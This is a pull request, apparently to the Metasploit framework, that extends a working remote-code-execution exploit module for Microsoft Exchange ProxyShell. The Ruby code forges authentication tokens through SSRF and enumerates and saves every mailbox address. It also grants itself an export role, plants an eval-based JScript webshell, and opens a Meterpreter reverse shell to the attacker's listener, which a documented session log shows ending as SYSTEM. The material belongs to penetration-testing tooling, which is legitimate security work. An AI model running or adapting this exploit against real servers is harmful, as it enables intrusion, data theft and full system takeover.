### PR TITLE
ProxyShell Improvements

### DIFF
--- a/data/exploits/proxyshell/soap_autodiscover.xml.erb
+++ b/data/exploits/proxyshell/soap_autodiscover.xml.erb
@@ -1,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
+  <Request>
+    <EMailAddress><%= email.encode(xml: :text) %></EMailAddress>
+    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
+  </Request>
+</Autodiscover>

--- a/data/exploits/proxyshell/soap_getemails.xml.erb
+++ b/data/exploits/proxyshell/soap_getemails.xml.erb
@@ -1,0 +1,14 @@
+<soap:Envelope
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
+  xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+  xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Header>
+    <t:RequestServerVersion Version="Exchange2016" />
+  </soap:Header>
+  <soap:Body>
+    <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
+      <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
+    </m:ResolveNames>
+  </soap:Body>
+</soap:Envelope>

--- a/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
+++ b/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication
+This module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication
 (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve
 the RCE (Remote Code Execution).
 
@@ -16,20 +16,41 @@ This vulnerability affects:
 
 *Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)][1]*
 
+### Exploit Internals
+
+At a high level, the steps the exploit takes are as follows:
+
+1. Build a Common Access Token corresponding to a user with the "Mailbox Import Export" role
+    1. If an email address is specified using the `EMAIL` datastore option, the exploit will attempt to use the owner
+    1. If no email address is specified
+        1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses
+            * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py)
+        1. The module will store the enumerated email addresses in a CSV file
+        1. Each of the email addresses will be checked for the necessary role
+    1. A common access token will be built using the verified user's SID
+        * Email addresses are mapped to SIDs using a request to autodiscover and MAPI
+1. A draft email is saved to the identified user's mailbox containing an encoded webshell embedded within an attachment
+1. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
+1. The exploit waits for the webshell to be written and uses it to execute OS commands
+1. The webshell*, export request and draft email are all removed
+    * *The webshell can only be remove automatically if the selected payload establishes a sessions (such as Meterpreter)
+
+
 ## Verification Steps
 
 1. Start msfconsole
-2. Do: `use exploit/windows/http/exchange_proxyshell_rce`
-3. Do: `set RHOSTS [IP]`
-4. Do: `set EMAIL [EMAIL ADDRESS]`
-5. Do: `run`
+1. Do: `use exploit/windows/http/exchange_proxyshell_rce`
+1. Do: `set RHOSTS [IP]`
+1. Do: `run`
 
 ## Options
 
 ### EMAIL
 
-A known email address for this organization. This email address must be to a user with privileges to access the Exchange
-Management shell.
+A known email address for this organization. If specified, the user who owns the mailbox must either have the "Mailbox
+Import Export" role already or have the necessary permissions to assign it to themselves. This would typically be some
+sort of an administrative user. If this option is left blank, the module will enumerate all valid email addresses and
+check each one for the necessary privileges.
 
 ### UseAlternatePath
 
@@ -75,12 +96,12 @@ msf6 > use exploit/windows/http/exchange_proxyshell_rce
 [*] Using configured payload windows/x64/meterpreter/reverse_tcp
 msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOSTS 192.168.159.42
 RHOSTS => 192.168.159.42
-msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL smcintyre@exchg.lan
-EMAIL => smcintyre@exchg.lan
 msf6 exploit(windows/http/exchange_proxyshell_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 192.168.159.128 
 LHOST => 192.168.159.128
+msf6 exploit(windows/http/exchange_proxyshell_rce) > check
+[+] 192.168.159.42:443 - The target is vulnerable.
 msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.159.128:4444 
@@ -89,20 +110,21 @@ msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
 [*] Attempt to exploit for CVE-2021-34473
 [*] Retrieving backend FQDN over RPC request
 [*] Internal server name: win-bpid95acq7e.exchg.lan
-[*] Sending autodiscover request
-[*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan
-[*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
-[*] Sending mapi request
-[*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
-[*] Assigning the 'Mailbox Import Export' role
-[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
+[*] Enumerating valid email addresses and searching for one that either has the 'Mailbox Import Export' role or can self-assign it
+[*] Enumerated 2 email addresses
+[*] Saved mailbox and email address data to: /home/smcintyre/.msf4/loot/20210827174927_default_192.168.159.42_ad.exchange.mail_205456.txt
+[+] Successfully assigned the 'Mailbox Import Export' role
+[+] Proceeding with SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
+[*] Saving a draft email with subject 'ie1Y1uNnLfxL' containing the attachment with the embedded webshell
+[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\n7AB4NuOznEA.aspx
 [*] Waiting for the export request to complete...
 [+] The mailbox export request has completed
 [*] Triggering the payload
 [*] Sending stage (200262 bytes) to 192.168.159.42
-[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
-[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:6787) at 2021-08-17 17:32:26 -0400
+[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\n7AB4NuOznEA.aspx
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:7149) at 2021-08-27 17:49:40 -0400
 [*] Removing the mailbox export request
+[*] Removing the draft email
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
@@ -112,7 +134,7 @@ OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US
 Domain          : EXCHG
-Logged On Users : 6
+Logged On Users : 8
 Meterpreter     : x64/windows
 meterpreter >
 ```

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -154,13 +154,13 @@ class MetasploitModule < Msf::Exploit::Remote
     id.upcase
   end
 
-  def request_autodiscover(_server_name)
+  def request_autodiscover(email)
     xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }
 
     response = send_http(
       'POST',
       '/autodiscover/autodiscover.xml',
-      data: soap_autodiscover,
+      data: XMLTemplate.render('soap_autodiscover', email: email),
       ctype: 'text/xml; charset=utf-8'
     )
 
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff
-  def request_mapi(_server_name, legacy_dn)
+  def request_mapi(legacy_dn)
     data = "#{legacy_dn}\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
     headers = {
       'X-RequestType' => 'Connect',
@@ -236,8 +236,13 @@ class MetasploitModule < Msf::Exploit::Remote
     sid
   end
 
+  def get_sid_for_email(email)
+    autodiscover = request_autodiscover(email)
+    request_mapi(autodiscover[:legacy_dn])
+  end
+
   # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.
-  def run_cve_2021_34473
+  def exploit_setup
     if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?
       server_name = datastore['BackendServerName']
       print_status("Internal server name forced to: #{server_name}")
@@ -248,20 +253,45 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     @backend_server_name = server_name
 
-    # get information via an autodiscover request.
-    print_status('Sending autodiscover request')
-    autodiscover = request_autodiscover(server_name)
+    get_common_access_token
+  end
 
-    print_status("Server: #{autodiscover[:server]}")
-    print_status("LegacyDN: #{autodiscover[:legacy_dn]}")
+  def get_common_access_token
+    # get a SID from the specified email address
+    email_address = datastore['EMAIL']
+    root_sid = get_sid_for_email(email_address)
+    print_status("SID: #{root_sid} (#{email_address})")
 
-    # get the user UID using mapi request.
-    print_status('Sending mapi request')
-    mailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn])
-    print_status("SID: #{mailbox_user_sid} (#{datastore['EMAIL']})")
+    common_access_token = build_token(root_sid)
 
-    send_payload(mailbox_user_sid)
-    @common_access_token = build_token(mailbox_user_sid)
+    powershell_probe = send_http('GET', "/PowerShell/?X-Rps-CAT=#{common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}", cookie: :none)
+    fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200
+
+    print_status('Assigning the \'Mailbox Import Export\' role')
+    if execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
+      @mailbox_user_sid = root_sid
+      @mailbox_user_email = email_address
+      @common_access_token = common_access_token
+      return
+    end
+
+    print_warning('Failed to assign the \'Mailbox Import Export\' role, enumerating other email addresses')
+    all_email_addresses = get_emails
+    print_status("Enumerated #{all_email_addresses.length} email addresses")
+    all_email_addresses.each do |email_address|
+      next if email_address == datastore['EMAIL'] # already tried this one
+      vprint_status("Reattempting to assign the 'Mailbox Import Export' role via #{email_address}")
+      this_sid = get_sid_for_email(email_address)
+      common_access_token = build_token(this_sid)
+      if execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
+        @mailbox_user_sid = this_sid
+        @mailbox_user_email = email_address
+        @common_access_token = common_access_token
+        return
+      end
+    end
+
+    fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')
   end
 
   def send_http(method, uri, opts = {})
@@ -288,13 +318,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_emails
+    # todo: should store these email addresses
     envelope = XMLTemplate.render('soap_getemails')
     res = send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
     fail_with(Failure::UnexpectedReply, 'Failed to enumerate email addresses from Active Directory') unless res&.code == 200
     res.get_xml_document.xpath('//t:Mailbox/t:EmailAddress', {'t' => "http://schemas.microsoft.com/exchange/services/2006/types"}).map(&:text)
   end
 
-  def send_payload(user_sid)
+  def create_embedded_draft(user_sid)
     @shell_input_name = rand_text_alphanumeric(8..12)
     @draft_subject = rand_text_alphanumeric(8..12)
     payload = Rex::Text.encode_base64(PstEncoding.encode("#<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request[\"#{@shell_input_name}\"],\"unsafe\");}</script>"))
@@ -302,18 +333,6 @@ class MetasploitModule < Msf::Exploit::Remote
     envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)
 
     send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
-  end
-
-  def soap_autodiscover
-    <<~SOAP
-      <?xml version="1.0" encoding="utf-8"?>
-      <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
-        <Request>
-          <EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress>
-          <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
-        </Request>
-      </Autodiscover>
-    SOAP
   end
 
   def web_directory
@@ -333,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
     token << uint8_tlv.call('T', 'Windows')
     token << "\x43\x00"
     token << uint8_tlv.call('A', 'Kerberos')
-    token << uint8_tlv.call('L', datastore['EMAIL'])
+    token << uint8_tlv.call('L', 'Administrator')
     token << uint8_tlv.call('U', sid)
 
     # group data for S-1-5-32-544
@@ -361,24 +380,32 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     })
 
-    winrm.shell(:powershell) do |shell|
-      shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
-      shell.extend(SSRFWinRMConnection::PowerShell)
-      shell.run({ cmdlet: cmdlet, args: args })
+    successful = true
+    begin
+      winrm.shell(:powershell) do |shell|
+        shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
+        shell.extend(SSRFWinRMConnection::PowerShell)
+        shell.run({ cmdlet: cmdlet, args: args }) do |stdout, stderr|
+          successful &&= stderr.blank?
+        end
+      end
+    rescue WinRM::WinRMError => e
+      vprint_error("Exception: #{e.message}")
+      successful = false
+    rescue RuntimeError => e
+      print_error("Exception: #{e.inspect}")
+      successful = false
     end
+
+    successful
   end
 
   def exploit
     @ssrf_email ||= Faker::Internet.email
     print_status('Attempt to exploit for CVE-2021-34473')
-    run_cve_2021_34473
+    exploit_setup
 
-    powershell_probe = send_http('GET', "/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}", cookie: :none)
-    fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200
-
-    print_status('Assigning the \'Mailbox Import Export\' role')
-    execute_powershell(@common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])
-
+    create_embedded_draft(@mailbox_user_sid)
     @shell_filename = "#{rand_text_alphanumeric(8..12)}.aspx"
     if datastore['UseAlternatePath']
       unc_path = "#{datastore['IISBasePath'].split(':')[1]}\\#{datastore['IISWritePath']}"
@@ -395,7 +422,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @export_name = rand_text_alphanumeric(8..12)
     execute_powershell(@common_access_token, 'New-MailboxExportRequest', args: [
       { name: '-Name', value: @export_name },
-      { name: '-Mailbox', value: datastore['EMAIL'] },
+      { name: '-Mailbox', value: @mailbox_user_email },
       { name: '-IncludeFolders', value: '#Drafts#' },
       { name: '-ContentFilter', value: "(Subject -eq '#{@draft_subject}')" },
       { name: '-ExcludeDumpster' },
@@ -443,7 +470,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Removing the mailbox export request')
     execute_powershell(@common_access_token, 'Remove-MailboxExportRequest', args: [
-      { name: '-Identity', value: "#{datastore['EMAIL']}\\#{@export_name}" },
+      { name: '-Identity', value: "#{@mailbox_user_email}\\#{@export_name}" },
       { name: '-Confirm', value: false }
     ])
   end

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -435,7 +435,7 @@ class MetasploitModule < Msf::Exploit::Remote
       unc_path = "\\\\\\\\#{@backend_server_name}\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\#{@shell_filename}"
     end
 
-    normal_path = unc_path.gsub(/^\\+127\.0\.0\.1\\(.)\$\\/, '\1:\\')
+    normal_path = unc_path.gsub(/^\\+[\w\.\-]+\\(.)\$\\/, '\1:\\')
     print_status("Writing to: #{normal_path}")
     register_file_for_cleanup(normal_path)
 

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -41,6 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'PeterJson', # Vulnerability analysis
           'brandonshi123', # Vulnerability analysis
           'mekhalleh (RAMELLA Sébastien)', # exchange_proxylogon_rce template
+          'Donny Maasland', # Procedure optimizations (email enumeration)
+          'Rich Warren', # Procedure optimizations (email enumeration)
           'Spencer McIntyre', # Metasploit module
           'wvu' # Testing
         ],
@@ -50,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2021-31207' ],
           [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],
           [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],
-          [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ]
+          [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ],
+          [ 'URL', 'https://github.com/dmaasland/proxyshell-poc' ]
         ],
         'DisclosureDate' => '2021-04-06', # pwn2own 2021
         'License' => MSF_LICENSE,
@@ -284,6 +287,13 @@ class MetasploitModule < Msf::Exploit::Remote
     received
   end
 
+  def get_emails
+    envelope = XMLTemplate.render('soap_getemails')
+    res = send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
+    fail_with(Failure::UnexpectedReply, 'Failed to enumerate email addresses from Active Directory') unless res&.code == 200
+    res.get_xml_document.xpath('//t:Mailbox/t:EmailAddress', {'t' => "http://schemas.microsoft.com/exchange/services/2006/types"}).map(&:text)
+  end
+
   def send_payload(user_sid)
     @shell_input_name = rand_text_alphanumeric(8..12)
     @draft_subject = rand_text_alphanumeric(8..12)
@@ -331,12 +341,12 @@ class MetasploitModule < Msf::Exploit::Remote
     Rex::Text.encode_base64(token)
   end
 
-  def execute_powershell(cmdlet, args: [])
+  def execute_powershell(common_access_token, cmdlet, args: [])
     winrm = SSRFWinRMConnection.new({
       endpoint: full_uri('PowerShell/'),
       transport: :ssrf,
       ssrf_proc: proc do |method, uri, opts|
-        uri = "#{uri}?X-Rps-CAT=#{@common_access_token}"
+        uri = "#{uri}?X-Rps-CAT=#{common_access_token}"
         uri << "&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}"
         opts[:cookie] = :none
         opts[:data].gsub!(
@@ -367,7 +377,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200
 
     print_status('Assigning the \'Mailbox Import Export\' role')
-    execute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])
+    execute_powershell(@common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])
 
     @shell_filename = "#{rand_text_alphanumeric(8..12)}.aspx"
     if datastore['UseAlternatePath']
@@ -383,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(normal_path)
 
     @export_name = rand_text_alphanumeric(8..12)
-    execute_powershell('New-MailboxExportRequest', args: [
+    execute_powershell(@common_access_token, 'New-MailboxExportRequest', args: [
       { name: '-Name', value: @export_name },
       { name: '-Mailbox', value: datastore['EMAIL'] },
       { name: '-IncludeFolders', value: '#Drafts#' },
@@ -393,7 +403,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     print_status('Waiting for the export request to complete...')
-    30.times do
+    30.times do # todo: remove this command so a subprocess is not created for checking purposes
       if execute_command('whoami')&.code == 200
         print_good('The mailbox export request has completed')
         break
@@ -432,7 +442,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless @common_access_token && @export_name
 
     print_status('Removing the mailbox export request')
-    execute_powershell('Remove-MailboxExportRequest', args: [
+    execute_powershell(@common_access_token, 'Remove-MailboxExportRequest', args: [
       { name: '-Identity', value: "#{datastore['EMAIL']}\\#{@export_name}" },
       { name: '-Confirm', value: false }
     ])
@@ -508,6 +518,8 @@ class XMLTemplate
       b = binding
       locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
       b.eval(locals.join)
+    when NilClass
+      b = binding
     else
       raise ArgumentError
     end

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -348,6 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def create_embedded_draft(user_sid)
     @shell_input_name = rand_text_alphanumeric(8..12)
     @draft_subject = rand_text_alphanumeric(8..12)
+    print_status("Saving a draft email with subject '#{@draft_subject}' containing the attachment with the embedded webshell")
     payload = Rex::Text.encode_base64(PstEncoding.encode("#<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request[\"#{@shell_input_name}\"],\"unsafe\");}</script>"))
     file_name = "#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}"
     envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)
@@ -497,6 +498,14 @@ class MetasploitModule < Msf::Exploit::Remote
     execute_powershell(@common_access_token, 'Remove-MailboxExportRequest', args: [
       { name: '-Identity', value: "#{@mailbox_user_email}\\#{@export_name}" },
       { name: '-Confirm', value: false }
+    ])
+
+    print_status('Removing the draft email')
+    execute_powershell(@common_access_token, 'Search-Mailbox', args: [
+      { name: '-Identity', value: @mailbox_user_email },
+      { name: '-SearchQuery', value: "Subject:\"#{@draft_subject}\"" },
+      { name: '-Force' },
+      { name: '-DeleteContent' }
     ])
   end
 

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Microsoft Exchange ProxyShell RCE',
         'Description' => %q{
-          This module exploit a vulnerability on Microsoft Exchange Server that
+          This module exploits a vulnerability on Microsoft Exchange Server that
           allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an
           arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve
           the RCE (Remote Code Execution).

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('EMAIL', [true, 'A known email address for this organization']),
+      OptString.new('EMAIL', [false, 'A known email address for this organization']),
       OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),
     ])
 
@@ -260,8 +260,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # this function doesn't return unless it's successful
   def get_common_access_token
+    all_email_addresses = nil
     # get a SID from the specified email address
     email_address = datastore['EMAIL']
+    if email_address.blank?
+      all_email_addresses ||= get_emails
+      email_address = all_email_addresses.first
+    end
     root_sid = get_sid_for_email(email_address)
     print_status("SID: #{root_sid} (#{email_address})")
 
@@ -278,9 +283,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    print_warning('Failed to assign the \'Mailbox Import Export\' role, enumerating other email addresses')
-    all_email_addresses = get_emails
-    print_status("Enumerated #{all_email_addresses.length} email addresses")
+    print_warning('Failed to assign the \'Mailbox Import Export\' role, attempting with other email addresses')
+    all_email_addresses ||= get_emails
     all_email_addresses.each do |email_address|
       next if email_address == datastore['EMAIL'] # already tried this one
       vprint_status("Reattempting to assign the 'Mailbox Import Export' role via #{email_address}")
@@ -334,8 +338,9 @@ class MetasploitModule < Msf::Exploit::Remote
       mailbox_table << %w{ t:EmailAddress t:Name t:RoutingType t:MailboxType }.map { |xpath| mailbox.xpath(xpath, xml_ns)&.text || '' }
     end
 
+    print_status("Enumerated #{mailbox_table.rows.length} email addresses")
     stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)
-    print_status("Saved mailbox data to: #{stored_path}")
+    print_status("Saved mailbox and email address data to: #{stored_path}")
 
     mailbox_table.rows.map(&:first)
   end

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -254,8 +254,11 @@ class MetasploitModule < Msf::Exploit::Remote
     @backend_server_name = server_name
 
     get_common_access_token
+    print_good('Successfully assigned the \'Mailbox Import Export\' role')
+    print_good("Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})")
   end
 
+  # this function doesn't return unless it's successful
   def get_common_access_token
     # get a SID from the specified email address
     email_address = datastore['EMAIL']
@@ -318,11 +321,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_emails
-    # todo: should store these email addresses
     envelope = XMLTemplate.render('soap_getemails')
     res = send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
     fail_with(Failure::UnexpectedReply, 'Failed to enumerate email addresses from Active Directory') unless res&.code == 200
-    res.get_xml_document.xpath('//t:Mailbox/t:EmailAddress', {'t' => "http://schemas.microsoft.com/exchange/services/2006/types"}).map(&:text)
+
+    mailbox_table = Rex::Text::Table.new(
+      'Header'     => 'Exchange Mailboxes',
+      'Columns'    => %w{ EmailAddress Name RoutingType MailboxType }
+    )
+    xml_ns = {'t' => "http://schemas.microsoft.com/exchange/services/2006/types"}
+    res.get_xml_document.xpath('//t:Mailbox', xml_ns).each do |mailbox|
+      mailbox_table << %w{ t:EmailAddress t:Name t:RoutingType t:MailboxType }.map { |xpath| mailbox.xpath(xpath, xml_ns)&.text || '' }
+    end
+
+    stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)
+    print_status("Saved mailbox data to: #{stored_path}")
+
+    mailbox_table.rows.map(&:first)
   end
 
   def create_embedded_draft(user_sid)

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -258,44 +258,51 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})")
   end
 
-  # this function doesn't return unless it's successful
-  def get_common_access_token
-    all_email_addresses = nil
-    # get a SID from the specified email address
-    email_address = datastore['EMAIL']
-    if email_address.blank?
-      all_email_addresses ||= get_emails
-      email_address = all_email_addresses.first
-    end
-    root_sid = get_sid_for_email(email_address)
-    print_status("SID: #{root_sid} (#{email_address})")
-
-    common_access_token = build_token(root_sid)
-
+  def probe_powershell_backend(common_access_token)
     powershell_probe = send_http('GET', "/PowerShell/?X-Rps-CAT=#{common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}", cookie: :none)
     fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200
+  end
 
-    print_status('Assigning the \'Mailbox Import Export\' role')
-    if execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
-      @mailbox_user_sid = root_sid
+  # this function doesn't return unless it's successful
+  def get_common_access_token
+    # get a SID from the specified email address
+    email_address = datastore['EMAIL']
+    unless email_address.blank?
+      sid = get_sid_for_email(email_address)
+      vprint_status("SID: #{sid} (#{email_address})")
+      common_access_token = build_token(sid)
+      probe_powershell_backend(common_access_token)
+
+      print_status("Assigning the 'Mailbox Import Export' role via #{email_address}")
+      unless execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
+        fail_with(Failure::BadConfig, 'The specified email address does not have the \'Mailbox Import Export\' role and can not self-assign it')
+      end
+
+      @mailbox_user_sid = sid
       @mailbox_user_email = email_address
       @common_access_token = common_access_token
       return
     end
 
-    print_warning('Failed to assign the \'Mailbox Import Export\' role, attempting with other email addresses')
-    all_email_addresses ||= get_emails
-    all_email_addresses.each do |email_address|
-      next if email_address == datastore['EMAIL'] # already tried this one
-      vprint_status("Reattempting to assign the 'Mailbox Import Export' role via #{email_address}")
-      this_sid = get_sid_for_email(email_address)
-      common_access_token = build_token(this_sid)
-      if execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: email_address } ])
-        @mailbox_user_sid = this_sid
-        @mailbox_user_email = email_address
-        @common_access_token = common_access_token
-        return
+    print_status('Enumerating valid email addresses and searching for one that either has the \'Mailbox Import Export\' role or can self-assign it')
+    get_emails.each do |this_email_address|
+      next if this_email_address == email_address # already tried this one
+
+      vprint_status("Reattempting to assign the 'Mailbox Import Export' role via #{this_email_address}")
+      begin
+        this_sid = get_sid_for_email(this_email_address)
+      rescue RuntimeError
+        print_error("Failed to identify the SID for #{this_email_address}")
+        next
       end
+
+      common_access_token = build_token(this_sid)
+      next unless execute_powershell(common_access_token, 'New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: this_email_address } ])
+
+      @mailbox_user_sid = this_sid
+      @mailbox_user_email = this_email_address
+      @common_access_token = common_access_token
